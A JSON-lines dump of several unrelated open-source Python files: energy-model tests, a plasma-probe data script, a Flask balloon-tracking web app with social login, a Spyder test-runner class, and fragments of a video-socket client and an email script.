\"flow_eff_piecewise_intercept\": {\n \"data\": [0, -2, -16],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n },\n }\n build_and_compare(\n \"piecewise_efficiency\",\n \"conversion_milp,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"piecewise_efficiency\",\n \"available_flow_cap_binary\",\n \"available_flow_cap_continuous\",\n \"available_flow_cap_binary_continuous_switch\",\n ],\n \"variables\": [\"available_flow_cap\"],\n },\n )\n\n\n@pytest.mark.filterwarnings(\n \"ignore:(?s).*`test_conversion_plus` gives a carrier ratio for `heat`:calliope.exceptions.ModelWarning\"\n)\nclass TestFuelDist(CustomMathExamples):\n YAML_FILEPATH = \"fuel_dist.yaml\"\n\n def test_fuel_distribution(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"allow_fuel_distribution\": {\n \"data\": True,\n \"index\": [\"coal\"],\n \"dims\": \"carriers\",\n },\n },\n }\n build_and_compare(\n \"fuel_dist_base\",\n \"fuel_distribution,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"system_balance\",\n \"restrict_total_imports_and_exports\",\n ],\n \"variables\": [\"fuel_distributor\"],\n },\n )\n\n def test_fuel_distribution_nodal_limits(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"allow_fuel_distribution\": {\n \"data\": True,\n \"index\": [\"coal\"],\n \"dims\": \"carriers\",\n },\n \"fuel_import_max\": {\n \"data\": 5,\n \"index\": [[\"coal\", \"b\"]],\n \"dims\": [\"carriers\", \"nodes\"],\n },\n \"fuel_export_max\": {\n \"data\": 3,\n \"index\": [[\"coal\", \"a\"]],\n \"dims\": [\"carriers\", \"nodes\"],\n },\n },\n }\n build_and_compare(\n \"fuel_dist_nodal\",\n \"fuel_distribution,two_hours\",\n overrides,\n components={\n \"constraints\": [\"restrict_nodal_imports\", \"restrict_nodal_exports\"],\n },\n )\n\n def test_fuel_distribution_costs(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"allow_fuel_distribution\": {\n \"data\": True,\n \"index\": [\"coal\"],\n \"dims\": \"carriers\",\n },\n \"fuel_distributor_costs\": {\n \"data\": 5,\n \"index\": [[\"coal\", \"monetary\"]],\n \"dims\": [\"carriers\", \"costs\"],\n },\n },\n }\n build_and_compare(\n \"fuel_dist_cost\",\n \"fuel_distribution,two_hours,investment_costs\",\n overrides,\n components={\n \"global_expressions\": [\n \"cost_investment\", # Need to build these up so that `cost` is available in the objective\n \"cost_var\", # Need to build these up so that `cost` is available in the objective\n \"cost\", # Need to build these up so that `cost` is available in the objective\n \"cost_fuel_distribution\",\n ],\n \"objectives\": [\"min_cost_optimisation\"],\n },\n )\n\n\nclass TestUptimeDowntime(CustomMathExamples):\n YAML_FILEPATH = \"uptime_downtime_limits.yaml\"\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `capacity_factor:calliope.exceptions.ModelWarning\"\n )\n def test_annual_capacity_factor(self, build_and_compare):\n overrides = {\n \"techs.test_supply_elec.constraints.capacity_factor_min\": 0.8,\n \"techs.test_supply_elec.constraints.capacity_factor_max\": 0.9,\n }\n build_and_compare(\n \"annual_capacity_factor\",\n \"simple_supply,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"annual_capacity_factor_min\",\n \"annual_capacity_factor_max\",\n ]\n },\n )\n\n def test_downtime(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"downtime_periods\": {\n \"data\": True,\n \"index\": [[\"test_supply_elec\", \"a\", \"2005-01-01 00:00\"]],\n \"dims\": [\"techs\", \"nodes\", \"timesteps\"],\n },\n },\n }\n build_and_compare(\n \"downtime_period\",\n \"simple_supply,two_hours\",\n overrides,\n components={\"constraints\": [\"downtime_period\"]},\n )\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `uptime_limit`:calliope.exceptions.ModelWarning\"\n )\n def test_downtime_decision(self, build_and_compare):\n overrides = {\n \"techs.test_supply_elec.constraints.uptime_limit\": 1,\n }\n build_and_compare(\n \"downtime_period_decision\", \"supply_milp,two_hours\", overrides\n )\n\n\nclass TestNetImportShare(CustomMathExamples):\n YAML_FILEPATH = \"net_import_share.yaml\"\n shared_overrides = {\n \"parameters.net_import_share\": 1.5,\n \"nodes.c.techs\": {\n \"test_demand_heat\": {\"constraints.sink_equals\": \"file=demand_heat.csv:a\"}\n },\n \"links.a,c.techs\": {\n \"test_transmission_heat\": None,\n \"test_transmission_elec\": None,\n },\n }\n\n def test_net_import_share_max(self, build_and_compare):\n build_and_compare(\n \"net_import_share_max\", \"simple_supply,two_hours\", self.shared_overrides\n )\n\n def test_net_annual_import_share_max(self, build_and_compare):\n build_and_compare(\n \"net_annual_import_share_max\",\n \"simple_supply,two_hours\",\n self.shared_overrides,\n )\n\n def test_net_annual_import_share_max_node_group(self, build_and_compare):\n build_and_compare(\n \"net_annual_import_share_max_node_group\",\n \"simple_supply,two_hours\",\n self.shared_overrides,\n )\n","repo_name":"calliope-project/calliope","sub_path":"tests/test_math.py","file_name":"test_math.py","file_ext":"py","file_size_in_byte":25608,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"94"} +{"seq_id":"3730012940","text":"import os\nimport json\nimport sys\n# import pandas as pd\nfrom pandas import DataFrame\nimport numpy as np\n\nA = 12 * 10**-6\n\ndef aggregate_data(path):\n '''\n This function reads all data from a directory\n and puts it in a dataframe.\n '''\n # list for all data\n items = [x for x in os.listdir(path)]\n print(\"Reading dataset:\" + str(items))\n data = []\n # reading all json files\n for item in items:\n data += json.load(open(path + \"/\" + item + \"/fit_results.json\", 'r'))\n # creating dataframe\n df = DataFrame(data, columns=['id', 'probe', 'x', 'I_B', 'P', 'W_em', 'P_off',\n 'T_e', 'err_T_e', 'n_e', 'err_n_e', 'f_ep', 'err_f_ep',\n 'v_plasma', 'err_v_plasma', 'alpha', 'err_alpha',\n 'v_floating', 'err_v_floating',\n 'i_ionic_sat', 'err_i_ionic_sat'])\n # post_processing on the whole data\n post_processing(df)\n return df\n\n\ndef post_processing(df):\n df['j_sat'] = df['i_ionic_sat'] / A\n\n\ndef remove_bias_ne(df):\n '''This function removes the bias getting\n the scale in the middle point of the selected columns'''\n j1 = df[(df.x == 0) & (df.probe == 1)]['j_sat'].values[0]\n j2 = df[(df.x == 0) & (df.probe == 2)]['j_sat'].values[0]\n medio = (j2 + j1) / 2\n delta1 = (medio - j1) / j1\n delta2 = (medio - j2) / j2\n df.ix[df.probe == 1, 'n_e'] *= (1 + delta1)\n df.ix[df.probe == 2, 'n_e'] *= (1 + delta2)\n\n\ndef remove_bias(df, columns):\n '''This function removes the bias in the central\n point for the column specified'''\n deltas = []\n for column in columns:\n s1 = df[(df.probe == 1) & (df.x == 0)][column].values[0]\n s2 = df[(df.probe == 2) & (df.x == 0)][column].values[0]\n delta = (s2 - s1) / 2\n df.ix[df.probe == 1, column] += delta\n df.ix[df.probe == 2, column] -= delta\n deltas.append((round(((delta * 2) / s1) * 100, 4),\n round(((delta * 2) / s2) * 100, 4)))\n return deltas\n\ndef get_fuh(df, B):\n '''This funcion adds to the dataframe the f_upperhybrid'''\n f_ce = np.multiply(2.80e6, B)\n df[\"B\"] = B\n df[\"f_uh\"] = (df.f_ep**2 + f_ce**2)**0.5\n df[\"err_f_uh\"] = (df.f_ep / ((df.f_ep**2 + df.B**2)**(3 / 2))) * df.err_f_ep\n\n\nif __name__ == \"__main__\":\n # reading from the conf file\n path = sys.argv[1]\n df = aggregate_data(path)\n","repo_name":"grigolet/lab16gym","sub_path":"langmuir/gymness/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16508333385","text":"#!/usr/bin/env python3\n\nfrom flask import Flask, abort, render_template, request, make_response, redirect, url_for\nimport json, sys, urllib\nimport logging\n\nfrom miscellaneous import *\nimport auth\nimport lang\nimport design\nimport config\nfrom balloon import Balloon\nfrom db import DB\n\nball = Flask(__name__)\nactions = {}\n\n\ndef page(*, title, content):\n return render_template(\n 'template.html',\n title=title,\n base=config.base_url,\n content=content\n )\n\n\n# actions: methods that modify something\n\n@arguments(None, id=int)\ndef action_access_grant(db, *, id):\n db.volunteer_access(id, True)\n return redirect(url_for('volunteers'))\n\n@arguments(None, id=int)\ndef action_access_refuse(db, *, id):\n db.volunteer_access(id, False)\n return redirect(url_for('volunteers'))\n\n@arguments(None, url=str)\ndef action_event_add(db, *, url):\n db.event_add(1, url)\n return redirect(url_for('index'))\n\n@arguments(None, problem=int, value=str)\ndef action_color_set(db, *, problem, value):\n db.problem_color(problem, value)\n return redirect(url_for(\"problem\", problem=problem))\n\n@arguments(None, event=int, balloon=int, volunteer=str)\ndef action_balloon_done(db, *, event, balloon, volunteer):\n db.balloon_done(balloon, volunteer)\n return redirect(url_for(\"event\", event=event))\n\n@arguments(None, event=int, balloon=int)\ndef action_balloon_drop(db, *, event, balloon):\n db.balloon_drop(balloon)\n return redirect(url_for(\"event\", event=event))\n\n@arguments(None, event=int, balloon=int, volunteer=str)\ndef action_balloon_take(db, *, event, balloon, volunteer):\n balloon = db.balloon(balloon, lock=True)\n if balloon is None:\n return abort(404)\n state = int (balloon[4])\n if state >= 100:\n return page(\n title=lang.lang['error'],\n content=design.error(\n message=lang.lang['error_ball_taken'],\n back=url_for(\"event\", event=event)\n )\n )\n db.balloon_take(balloon[0], volunteer)\n return redirect(url_for(\"event\", event=event))\n\n\n@ball.route('/action_mk2', methods=['POST'])\ndef do_action_mk2():\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'), code=307)\n token = request.form['token']\n token_cookie = request.cookies.get('ball_token')\n if token != token_cookie or len(token) < 10:\n print (\"token mismatch: %s vs %s\" % (repr (token), repr (token_cookie)), file=sys.stderr)\n return abort(403);\n try:\n callback = {\n 'access_grant': action_access_grant,\n 'access_refuse': action_access_refuse,\n 'event_add': action_event_add,\n 'color_set': action_color_set,\n 'balloon_take': action_balloon_take,\n 'balloon_drop': action_balloon_drop,\n 'balloon_done': action_balloon_done,\n }[request.form['method']]\n except KeyError:\n print (\"unknown action method: '%s'\" % request.form['method'])\n return abort(404)\n db = DB()\n result = callback(db, **{\n k: v for k, v in request.form.items()\n if k not in ['method', 'token']\n })\n db.close(commit=True)\n return result\n\n\nvolunteer_cache = {}\ndef volunteer_get(volunteer_id):\n if volunteer_id in volunteer_cache:\n return volunteer_cache[volunteer_id]\n if volunteer_id.startswith('vk:'):\n vk_id = int (volunteer_id[3:])\n api_url = \"https://api.vk.com/method/users.get?\" + \\\n urllib.parse.urlencode({'user_ids': vk_id})\n try:\n res = json.loads(urllib.request.urlopen(api_url).read().decode())\n except urllib.error.HTTPError:\n return None\n if 'error' in res:\n return None\n res = res['response'][0]\n volunteer_cache[volunteer_id] = (\n \"%s %s\" % (res['first_name'], res['last_name']),\n \"https://vk.com/id%s\" % res['uid']\n )\n return volunteer_cache[volunteer_id]\n if volunteer_id.startswith('google:'):\n google_id = int (volunteer_id[7:])\n api_url = \"https://www.googleapis.com/plus/v1/people/%d?key=%s\" % (\n google_id, config.google_key\n )\n try:\n res = json.loads(urllib.request.urlopen(api_url).read().decode())\n except urllib.error.HTTPError:\n return None\n if 'error' in res:\n return None\n volunteer_cache[volunteer_id] = (res['displayName'], res['url'])\n return volunteer_cache[volunteer_id]\n return None\n\n\n@ball.route('/')\ndef index():\n user_id, auth_html, user_ok = check_auth(request)\n content = ''\n db = DB()\n events = db.events()\n db.close()\n if len(events) == 0:\n content = lang.lang['index_no_events']\n if user_ok:\n event_link = design.event_link\n else:\n event_link = design.event_nolink\n for e in events:\n if e[1]:\n content += event_link(url=url_for('event', event=e[0]), name=e[1])\n else:\n content += design.event_nolink(name=e[3])\n if user_ok:\n content += design.action_form_event(arguments={\n 'method': 'event_add',\n })\n content += design.link(url=url_for('volunteers'), label=lang.lang['access_manage'])\n response = make_response(render_template(\n 'template.html',\n title=lang.lang['index_title'],\n auth=auth_html,\n base=config.base_url,\n content=content\n ))\n if user_ok:\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\n@ball.route('/volunteers')\ndef volunteers():\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n volunteers = []\n for id in config.allowed_users:\n volunteer = volunteer_get(id)\n if volunteer is None:\n volunteer_str = design.volunteer(id=str(id))\n else:\n volunteer_name, volunteer_link = volunteer\n volunteer_str = ' ' + design.volunteer_ext(\n name=volunteer_name,\n url=volunteer_link\n )\n if id == user_id:\n change = design.text(text=lang.lang['this_is_you'])\n else:\n change = design.text(text=lang.lang['volunteer_from_config'])\n volunteers.append(design.volunteer_access(\n name=volunteer_str,\n change=change\n ))\n db = DB()\n for db_id, id, access in db.volunteers():\n volunteer = volunteer_get(id)\n if volunteer is None:\n volunteer_str = design.volunteer(id=str(id))\n else:\n volunteer_name, volunteer_link = volunteer\n volunteer_str = ' ' + design.volunteer_ext(\n name=volunteer_name,\n url=volunteer_link\n )\n if id == user_id:\n change = design.text(text=lang.lang['this_is_you'])\n elif access:\n change = design.action_link_mk2(\n arguments={\n 'method': 'access_refuse',\n 'id': db_id\n },\n label=lang.lang['access_refuse']\n )\n else:\n change = design.action_link_mk2(\n arguments={\n 'method': 'access_grant',\n 'id': db_id\n },\n label=lang.lang['access_grant']\n )\n volunteers.append((\n design.volunteer_access if access else design.volunteer_noaccess\n )(\n name=volunteer_str,\n change=change\n ))\n db.close()\n volunteers = ''.join(volunteers)\n content = design.volunteers(volunteers=volunteers)\n response = make_response (render_template(\n 'template.html',\n title=lang.lang['volunteers_title'],\n auth=auth_html,\n base=config.base_url,\n content=content\n ))\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\n@ball.route('/problem')\ndef problem(problem):\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n problem_id = int(problem)\n content = ''\n db = DB()\n problems = [db.problem(problem_id)]\n db.close()\n problems_html = design.problem_header(letter=problems[0]['letter'], name=problems[0]['name'])\n content += problems_html\n colors_html = ''\n colors_html += design.problem_color(color=problems[0]['color'])\n colors_html += design.action_form_color(\n arguments={\n 'method': 'color_set',\n 'problem': problem_id\n },\n default=problems[0]['color']\n )\n content += colors_html\n response = make_response (render_template(\n 'template.html',\n title=problems[0]['letter'],\n auth=auth_html,\n base=config.base_url,\n content=content\n ))\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\ndef get_state_str_current(event_id, b, *, user_id):\n state_str = design.action_link_mk2(\n arguments={\n 'method': 'balloon_done',\n 'event': event_id,\n 'balloon': b.id,\n 'volunteer': user_id\n },\n label=lang.lang['event_queue_done']\n ) + ' ' + design.action_link_mk2(\n arguments={\n 'method': 'balloon_drop',\n 'event': event_id,\n 'balloon': b.id\n },\n label=lang.lang['event_queue_drop']\n )\n return state_str\n\n\ndef get_state_str_queue(event_id, b, *, user_id):\n state_str = None\n if b.state >= 0 and b.state < 100:\n state_str = (\n design.text(text=lang.lang['balloon_state_wanted']) + ' ' +\n design.action_link_mk2(\n arguments={\n 'method': 'balloon_take',\n 'event': event_id,\n 'balloon': b.id,\n 'volunteer': user_id\n },\n label=lang.lang['event_queue_take']\n )\n )\n elif b.state < 200:\n state_str = design.text(text=lang.lang['balloon_state_carrying'])\n elif b.state < 300:\n state_str = design.text(text=lang.lang['balloon_state_delivered'])\n else:\n state_str = design.text(lang.lang['balloon_state_error'])\n if str(b.volunteer_id) != '':\n volunteer = volunteer_get (str(b.volunteer_id))\n if volunteer is None:\n state_str += ' ' + design.volunteer(id=str(b.volunteer_id))\n else:\n volunteer_name, volunteer_link = volunteer\n state_str += ' ' + design.volunteer_ext(\n name=volunteer_name,\n url=volunteer_link\n )\n return state_str\n\n\n@ball.route('/event')\ndef event(event):\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n event_id = int(event)\n content = ''\n db = DB()\n try:\n e = db.event(event_id)\n except KeyError:\n e = None\n if e is None:\n return redirect(url_for('index'))\n event = {\n 'name': e[1],\n 'state': e[2],\n 'url': e[3]}\n event_html = ''\n event_html += design.standings_link(url=url_for('event_standings', event=event_id))\n content += event_html\n\n problems = db.problems(event_id)\n problems_map = {p['id']: i for i, p in enumerate (problems)}\n for p in problems:\n cnt = db.balloons_count(event_id, p['id'])\n p['cnt'] = cnt\n problems_html = design.problems(\n problems=''.join ([\n design.problem(\n color_token=' ' if p['color'] else '?',\n color=p['color'],\n url=url_for('problem', problem=p['id']),\n letter=p['letter'],\n count=str(p['cnt'])\n )\n for p in problems\n ])\n )\n content += problems_html\n\n teams = db.teams(event_id)\n teams_map = {t['id']: i for i, t in enumerate (teams)}\n\n first_to_solve = {}\n for p in problems:\n try:\n first_to_solve[p['id']] = db.fts(event_id, problem_id=p['id'])\n except KeyError:\n pass\n\n first_solved = {}\n for t in teams:\n try:\n first_solved[t['id']] = db.fts(event_id, team_id=t['id'])\n except KeyError:\n pass\n\n def get_balloons_html(header, get_state_str, balloons):\n nonlocal user_id\n if len(balloons) == 0:\n return ''\n balloons_html = []\n for b in balloons:\n p = problems[problems_map[b.problem_id]]\n t = teams[teams_map[b.team_id]]\n state_str = get_state_str(event_id, b, user_id=user_id)\n balloons_text = ' '\n if not p['color']:\n balloons_text = '?'\n if first_to_solve[b.problem_id] == b.id:\n x = design.fts(text=lang.lang['event_queue_problem'])\n else:\n x = design.fts_no(text=lang.lang['event_queue_problem'])\n # FTS for team is confusing, disable it for now\n #if b.team_id in first_solved and first_solved[b.team_id] == b.id:\n # y = design.fts(text=lang.lang['event_queue_team'])\n #else:\n y = design.fts_no(text=lang.lang['event_queue_team'])\n balloons_html.append(design.balloon(\n color_token=balloons_text,\n color=p['color'],\n problem_comment=x,\n letter=p['letter'],\n team_comment=y,\n team_short=t['name'],\n team=t['long_name'],\n state=state_str\n ))\n balloons_html = design.table(\n header=header + \" (%d)\" % len (balloons),\n content=''.join (balloons_html)\n )\n return balloons_html\n\n balloons = db.balloons_my(event_id, user_id)\n balloons = list (map (Balloon, balloons))\n content += get_balloons_html(\n lang.lang['event_header_your_queue'],\n get_state_str_current, balloons\n )\n balloons = db.balloons_new(event_id)\n balloons = list (map (Balloon, reversed (balloons)))\n content += get_balloons_html(\n lang.lang['event_header_offer'],\n get_state_str_queue, balloons\n )\n balloons = db.balloons_old(event_id)\n balloons = list (map (Balloon, balloons))\n content += get_balloons_html(\n lang.lang['event_header_queue'],\n get_state_str_queue, balloons\n )\n\n db.close()\n response = make_response(render_template(\n 'template.html',\n title=event['name'],\n base=config.base_url,\n content=content\n ))\n token = auth.create_token(user_id, add_random=True)\n response.set_cookie('ball_token', token)\n return response\n\n\n@ball.route('/event/standings')\ndef event_standings(event):\n user_id, auth_html, user_ok = check_auth(request)\n if not user_ok:\n return redirect(url_for('index'))\n event_id = int(event)\n db = DB()\n try:\n e = db.event(event_id)\n except KeyError:\n return redirect(url_for('index'))\n event = {\n 'name': e[1],\n 'state': e[2],\n 'url': e[3]\n }\n problems_header = []\n problems = db.problems(event_id)\n for p in problems:\n problems_header.append(design.standings_problem(\n name_full=p['name'],\n name_short=p['letter']\n ))\n try:\n p['fts'] = db.fts(event_id, problem_id=p['id'])\n except KeyError:\n pass\n\n oks = {}\n for b in db.balloons(event_id):\n oks[(b['team_id'], b['problem_id'])] = (b['id'], b['time_local'])\n\n standings_header = ''.join(problems_header)\n teams = []\n for t in db.teams(event_id):\n score = 0\n penalty = 0\n team_row = []\n for p in problems:\n key = (t['id'], p['id'])\n if key in oks:\n ok_id, time = oks[key]\n team_row.append(design.standings_yes(\n time=int(time),\n fts=ok_id == p['fts']\n ))\n score += 1\n penalty += int(time / 60) # TODO: incorrect: does not assume previous attempts\n else:\n team_row.append(design.standings_nope())\n teams.append ([t['long_name'], ''.join(team_row), score, penalty, True, False, 1])\n\n teams = list(sorted(teams, key=lambda t: (-t[2], t[3])))\n for i in range(1, len(teams)):\n teams[i][4] = not teams[i - 1][4]\n if teams[i][2] == teams[i - 1][2] and teams[i][3] == teams[i - 1][3]:\n teams[i][6] = teams[i - 1][6]\n else:\n teams[i][6] = i + 1\n for i in range(len(teams) - 2, -1, -1):\n if teams[i][2] == teams[i + 1][2]:\n teams[i][5] = teams[i + 1][5]\n else:\n teams[i][5] = not teams[i + 1][5]\n\n teams_list = []\n for name, problems, score, penalty, even, block_even, rank in teams:\n teams_list.append(design.standings_team(\n row=even,\n block=block_even,\n name=name,\n problems=problems,\n rank=rank,\n score=score,\n penalty=penalty\n ))\n even = not even\n standings_body = ''.join(teams_list)\n content = design.warning(\n message=lang.lang['warning_no_penalty_attempts']\n ) + design.standings_table(\n header=standings_header,\n body=standings_body\n )\n db.close()\n return page(\n title=event['name'],\n content=content\n )\n\n\nuser_cache = {}\ndef check_auth(request):\n auth_html = design.auth(url=url_for('method_auth'))\n try:\n user_id = request.cookies.get('ball_user_id')\n auth_token = request.cookies.get('ball_auth_token')\n except:\n return None, auth_html, False\n if not auth.check(user_id, auth_token):\n return None, auth_html, False\n # need to invalidate cache in action_access_*\n # if user_id in user_cache:\n # return user_cache[user_id]\n auth_html = design.auth_ok(user=str(user_id))\n user_ok = user_id in config.allowed_users\n if not user_ok:\n db = DB()\n user_ok = db.volunteer_get(user_id)\n db.close(commit=True)\n user_cache[user_id] = user_id, auth_html, user_ok\n return user_cache[user_id]\n\n\n@ball.route('/auth')\ndef method_auth():\n user_id, auth_html, user_ok= check_auth(request)\n content = design.auth_link(url=url_for('auth_vk_start'), label='VK') + \\\n design.auth_link(url=url_for('auth_google_start'), label='Google')\n return render_template(\n 'template.html',\n title=lang.lang['auth'],\n auth=auth_html,\n base=config.base_url,\n content=content)\n\n\n@ball.route('/auth/vk/start')\ndef auth_vk_start():\n return redirect(auth.vk.url)\n\n\n@ball.route('/auth/vk/done')\ndef auth_vk_done():\n try:\n code = request.args.get('code', '')\n except:\n code = 'None'\n try:\n user_id = auth.vk.do (code)\n except auth.AuthentificationError as error:\n error_content = 'Failed auth: ' + str(error)\n return render_template(\n 'template.html',\n title='Failed auth',\n base=config.base_url,\n content=error_content)\n auth_token = auth.create_token(user_id)\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('ball_auth_token', auth_token)\n resp.set_cookie('ball_user_id', user_id)\n return resp\n\n\n@ball.route('/auth/google/start')\ndef auth_google_start():\n return redirect(auth.google.url)\n\n\n@ball.route('/auth/google/done')\ndef auth_google_done():\n try:\n code = request.args.get('code', '')\n except:\n code = 'None'\n try:\n user_id = auth.google.do(code)\n except auth.AuthentificationError as error:\n error_content = 'Failed auth: ' + str(error)\n return render_template('template.html',\n title='Failed auth',\n base=config.base_url,\n content=error_content)\n auth_token = auth.create_token(user_id)\n resp = make_response(redirect(url_for('index')))\n resp.set_cookie('ball_auth_token', auth_token)\n resp.set_cookie('ball_user_id', user_id)\n return resp\n\nclass LoggerHandler (logging.StreamHandler):\n def emit (x, record):\n logging.StreamHandler.emit (x, record)\n\nif __name__ == '__main__':\n webc = config.config['web']\n ball.debug = webc['debug']\n ball.logger.setLevel(logging.DEBUG)\n handler = LoggerHandler()\n handler.setLevel(logging.DEBUG)\n ball.logger.addHandler(handler)\n ball.run(host=webc['host'], port=webc['port'])\n\n\n","repo_name":"testsys/ball","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":20842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"30481963490","text":"import os\nimport tempfile\n\n# Third party imports\nfrom qtpy.QtCore import (QObject, QProcess, QProcessEnvironment, QTextCodec,\n Signal)\nfrom spyder.py3compat import to_text_string\nfrom spyder.utils.misc import get_python_executable\n\ntry:\n from importlib.util import find_spec as find_spec_or_loader\nexcept ImportError: # Python 2\n from pkgutil import find_loader as find_spec_or_loader\n\n\nclass Category:\n \"\"\"Enum type representing category of test result.\"\"\"\n\n FAIL = 1\n OK = 2\n SKIP = 3\n PENDING = 4\n\n\nclass TestResult:\n \"\"\"Class representing the result of running a single test.\"\"\"\n\n def __init__(self, category, status, name, message='', time=None,\n extra_text='', filename=None, lineno=None):\n \"\"\"\n Construct a test result.\n\n Parameters\n ----------\n category : Category\n status : str\n name : str\n message : str\n time : float or None\n extra_text : str\n filename : str or None\n lineno : int or None\n \"\"\"\n self.category = category\n self.status = status\n self.name = name\n self.message = message\n self.time = time\n extra_text = extra_text.rstrip()\n if extra_text:\n self.extra_text = extra_text.split(\"\\n\")\n else:\n self.extra_text = []\n self.filename = filename\n self.lineno = lineno\n\n def __eq__(self, other):\n \"\"\"Test for equality.\"\"\"\n return self.__dict__ == other.__dict__\n\n\nclass RunnerBase(QObject):\n \"\"\"\n Base class for running tests with a framework that uses JUnit XML.\n\n This is an abstract class, meant to be subclassed before being used.\n Concrete subclasses should define executable and create_argument_list(),\n\n All communication back to the caller is done via signals.\n\n Attributes\n ----------\n module : str\n Name of Python module for test framework. This needs to be defined\n before the user can run tests.\n name : str\n Name of test framework, as presented to user.\n process : QProcess or None\n Process running the unit test suite.\n resultfilename : str\n Name of file in which test results are stored.\n\n Signals\n -------\n sig_collected(list of str)\n Emitted when tests are collected.\n sig_collecterror(list of (str, str) tuples)\n Emitted when errors are encountered during collection. First element\n of tuple is test name, second element is error message.\n sig_starttest(list of str)\n Emitted just before tests are run.\n sig_testresult(list of TestResult)\n Emitted when tests are finished.\n sig_finished(list of TestResult, str)\n Emitted when test process finishes. First argument contains the test\n results, second argument contains the output of the test process.\n sig_stop()\n Emitted when test process is being stopped.\n \"\"\"\n\n sig_collected = Signal(object)\n sig_collecterror = Signal(object)\n sig_starttest = Signal(object)\n sig_testresult = Signal(object)\n sig_finished = Signal(object, str)\n sig_stop = Signal()\n\n def __init__(self, widget, resultfilename=None):\n \"\"\"\n Construct test runner.\n\n Parameters\n ----------\n widget : UnitTestWidget\n Unit test widget which constructs the test runner.\n resultfilename : str or None\n Name of file in which to store test results. If None, use default.\n \"\"\"\n QObject.__init__(self, widget)\n self.process = None\n if resultfilename is None:\n self.resultfilename = os.path.join(tempfile.gettempdir(),\n 'unittest.results')\n else:\n self.resultfilename = resultfilename\n\n @classmethod\n def is_installed(cls):\n \"\"\"\n Check whether test framework is installed.\n\n This function tests whether self.module is installed, but it does not\n import it.\n\n Returns\n -------\n bool\n True if framework is installed, False otherwise.\n \"\"\"\n return find_spec_or_loader(cls.module) is not None\n\n def get_versions(self):\n \"\"\"\n Return versions of framework and its installed plugins.\n\n This function must only be called for installed frameworks.\n\n Returns\n -------\n list of str\n Strings with framework or plugin name, followed by\n its version.\n \"\"\"\n raise NotImplementedError\n\n def create_argument_list(self):\n \"\"\"\n Create argument list for testing process (dummy).\n\n This function should be defined before calling self.start().\n \"\"\"\n raise NotImplementedError\n\n def _prepare_process(self, config, pythonpath):\n \"\"\"\n Prepare and return process for running the unit test suite.\n\n This sets the working directory and environment.\n \"\"\"\n process = QProcess(self)\n process.setProcessChannelMode(QProcess.MergedChannels)\n process.setWorkingDirectory(config.wdir)\n process.finished.connect(self.finished)\n if pythonpath:\n env = QProcessEnvironment.systemEnvironment()\n old_python_path = env.value('PYTHONPATH', None)\n python_path_str = os.pathsep.join(pythonpath)\n if old_python_path:\n python_path_str += os.pathsep + old_python_path\n env.insert('PYTHONPATH', python_path_str)\n process.setProcessEnvironment(env)\n return process\n\n def start(self, config, pythonpath):\n \"\"\"\n Start process which will run the unit test suite.\n\n The process is run in the working directory specified in 'config',\n with the directories in `pythonpath` added to the Python path for the\n test process. The test results are written to the file\n `self.resultfilename`. The standard output and error are also recorded.\n Once the process is finished, `self.finished()` will be called.\n\n Parameters\n ----------\n config : TestConfig\n Unit test configuration.\n pythonpath : list of str\n List of directories to be added to the Python path\n\n Raises\n ------\n RuntimeError\n If process failed to start.\n \"\"\"\n self.process = self._prepare_process(config, pythonpath)\n executable = get_python_executable()\n p_args = self.create_argument_list()\n try:\n os.remove(self.resultfilename)\n except OSError:\n pass\n self.process.start(executable, p_args)\n running = self.process.waitForStarted()\n if not running:\n raise RuntimeError\n\n def finished(self):\n \"\"\"\n Called when the unit test process has finished.\n\n This function should be implemented in derived classes. It should read\n the results (if necessary) and emit `sig_finished`.\n \"\"\"\n raise NotImplementedError\n\n def read_all_process_output(self):\n \"\"\"Read and return all output from `self.process` as unicode.\"\"\"\n qbytearray = self.process.readAllStandardOutput()\n locale_codec = QTextCodec.codecForLocale()\n return to_text_string(locale_codec.toUnicode(qbytearray.data()))\n\n def stop_if_running(self):\n \"\"\"Stop testing process if it is running.\"\"\"\n if self.process and self.process.state() == QProcess.Running:\n self.process.kill()\n self.sig_stop.emit()\n","repo_name":"miszczube/spyder-unittest","sub_path":"spyder_unittest/backend/runnerbase.py","file_name":"runnerbase.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"72913397108","text":"import socket\nimport sys\nimport cv2\nimport pickle\nimport numpy as np\nimport struct ## new\n\nHOST = '192.168.1.5'\nPORT = 8089\n\nstream_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nif len(sys.argv) == 2:\n print(sys.argv[1])\n try: \n PORT = int(sys.argv[1])\n except:\n print('Incorrect PORT, trying on 8089') \n\nstream_socket.connect((HOST, PORT))\n\ndata = bytes()\npayload_size = struct.calcsize('\"\n\n for student in data:\n\n recipient = student['email']\n\n if validate_email(recipient):\n\n subject = \"TEST! Welcome {0} to Success Academy Charter Schools\".format(student['Name'])\n\n # The email body for recipients with 